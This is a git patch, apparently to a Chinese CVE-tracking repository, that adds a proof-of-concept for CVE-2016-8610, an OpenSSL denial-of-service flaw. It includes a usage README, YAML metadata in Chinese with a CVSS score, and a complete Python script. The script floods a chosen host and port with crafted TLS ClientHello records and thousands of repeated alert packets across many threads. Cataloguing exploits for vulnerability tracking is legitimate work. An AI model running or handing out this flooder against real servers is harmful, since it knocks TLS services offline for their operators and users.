From cec63962e0930a2ef5e03c9821fcaeb89a6ab58f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?= Date: Mon, 17 Apr 2023 11:41:14 +0000 Subject: [PATCH] CVE-2016-8610 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 好名字 --- cve/openssl/2016/CVE-2016-8610/README.md | 14 +++ .../2016/CVE-2016-8610/ssl-death-alert.py | 115 ++++++++++++++++++ cve/openssl/2016/yaml/CVE-2016-8610.yaml | 19 +++ openkylin_list.yaml | 1 + 4 files changed, 149 insertions(+) create mode 100644 cve/openssl/2016/CVE-2016-8610/README.md create mode 100644 cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py create mode 100644 cve/openssl/2016/yaml/CVE-2016-8610.yaml diff --git a/cve/openssl/2016/CVE-2016-8610/README.md b/cve/openssl/2016/CVE-2016-8610/README.md new file mode 100644 index 00000000..3eb697a6 --- /dev/null +++ b/cve/openssl/2016/CVE-2016-8610/README.md @@ -0,0 +1,14 @@ +# CVE-2016-8610 PoC +CVE-2016-8610 (SSL Death Alert) PoC + +Usage: + +python ssl-death-alert.py DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3, TLS1.0, TLS1.1, TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50) + +python ssl-death-alert.py test.tdl 443 TLS1.2 1000 50 + +More info: + +http://security.360.cn/cve/CVE-2016-8610/ + +https://securingtomorrow.mcafee.com/mcafee-labs/ssl-death-alert-cve-2016-8610-can-cause-denial-of-service-to-openssl-servers/ \ No newline at end of file diff --git a/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py b/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py new file mode 100644 index 00000000..44271893 --- /dev/null +++ b/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py @@ -0,0 +1,115 @@ +#!/usr/bin/python + +import socket +import errno +from socket import error as socket_error +import threading +import os +import sys + +def MAIN_CHECK(HOSTARG,PORTARG): + s0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + result = s0.connect_ex((HOSTARG, PORTARG)) + s0.close() + if result: + print("https://"+HOST+":"+str(PORT)+" seems to be down? :(\nCheck if service is running or maybe we are blocked?") + exit(1) + +def SEDNALL(): + while True: + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((HOST, PORT)) + sock.send(final_client_hello) + sock.send(final_client_alert) + sock.close + except socket_error as serr: + pass + +def INIT(): + try: + while True: + SEDNALL() + except socket_error as serr: + SEDNALL() + + +if len(sys.argv) != 6: + print("\nUsage: python "+sys.argv[0]+" DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3, TLS1.0, TLS1.1, TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50)\nUsage: python "+sys.argv[0]+" test.tdl 443 TLS1.2 1000 50\nCheck of the server supports the protocol before testing it ...") + exit(1) + +HOST, PORT = sys.argv[1], int(sys.argv[2]) +MAIN_CHECK(HOST,PORT) + +#SSL Client Hello +sslv3=b'\x16\x03\x00\x00\x8a\x01\x00\x00\x86\x03\x00\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01' +tls10=b'\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01' +tls11=b'\x16\x03\x02\x00\x8a\x01\x00\x00\x86\x03\x02\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01' +tls12=b'\x16\x03\x03\x00\x8a\x01\x00\x00\x86\x03\x03\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01' + +#Client Alert - (Level: Warning, Description: Certificate Unknown) +alertsslv3=b'\x15\x03\x00\x00\x02\x01\x2e' +alerttls10=b'\x15\x03\x01\x00\x02\x01\x2e' +alerttls11=b'\x15\x03\x02\x00\x02\x01\x2e' +alerttls12=b'\x15\x03\x03\x00\x02\x01\x2e' + +final_client_alert=b'' +protocol_version_used="" + +if str(sys.argv[3]) == "SSLv3": + final_client_hello=sslv3 + use_client_alert=alertsslv3 + protocol_version_used="Using SSL v3 protocol" +elif str(sys.argv[3]) == "TLS1.0": + final_client_hello=tls10 + use_client_alert=alerttls10 + protocol_version_used="Using TLS 1.0" +elif str(sys.argv[3]) == "TLS1.1": + final_client_hello=tls11 + use_client_alert=alerttls11 + protocol_version_used="Using TLS 1.1 protocol" +elif str(sys.argv[3]) == "TLS1.2": + final_client_hello=tls12 + use_client_alert=alerttls12 + protocol_version_used="Using TLS 1.2 protocol" +else: + print("Error: PROTOCOL-VERSION must be SSLv3 or TLS1.0 or TLS1.1 or TLS1.2") + exit(1) + +try: + numberofalerts=int(sys.argv[4]) +except ValueError: + print("Error: Number of Alerts must be interger - 1000 is a good start") + exit(1) + +try: + numberofthreads=int(sys.argv[5]) +except ValueError: + print("Error: Number of Threads must be interger greater than 1 - 50 is a good start") + exit(1) + +if numberofthreads == 1 or numberofthreads == 0 or numberofthreads < 0: + print("Error: Number of Threads must be interger greater than 1 - 50 is a good start") + exit(1) + +for x in range(1, numberofalerts): + final_client_alert+=use_client_alert + +threads = [] +for n in range(1,numberofthreads): + thread = threading.Thread(target=INIT) + thread.setDaemon(True) + thread.start() + threads.append(thread) +alertsize=sys.getsizeof(final_client_alert) +print(protocol_version_used) +print("Size of the Client Alert payload: "+str(alertsize/1024)+"."+str(alertsize%1024)+" kilobytes") +print("Attacking ...") + +try: + for thread in threads: + thread.join(999999) +except KeyboardInterrupt: + print("\nExiting ...") + os._exit(0) \ No newline at end of file diff --git a/cve/openssl/2016/yaml/CVE-2016-8610.yaml b/cve/openssl/2016/yaml/CVE-2016-8610.yaml new file mode 100644 index 00000000..4d87e46b --- /dev/null +++ b/cve/openssl/2016/yaml/CVE-2016-8610.yaml @@ -0,0 +1,19 @@ +id: CVE-2016-8610 +source: + https://github.com/cujanovic/CVE-2016-8610-PoC +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: high + description: 在 OpenSSL 0.9.8、1.0.1、1.0.2 至 1.0.2h 和 1.1.0 中发现一个拒绝服务缺陷,其方式是 TLS/SSL 协议定义连接握手期间 ALERT 数据包的处理方式。远程攻击者可利用此缺陷使 TLS/SSL 服务器消耗过多的 CPU,并且无法接受来自其他客户端的连接。 + scope-of-influence: + OpenSSL 0.9.8、1.0.1、1.0.2 至 1.0.2h 和 1.1.0 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2016-8610 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2016-8610 + cwe-id: CWE-400 + cnvd-id: None + kve-id: None + tags: 拒绝服务,DoS \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a39bab91..c8c1b2eb 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -142,6 +142,7 @@ cve: - CVE-2022-0778 - CVE-2022-3786 - CVE-2016-2107 + - CVE-2016-8610 joomla: - CVE-2023-23752 libxml2: -- Gitee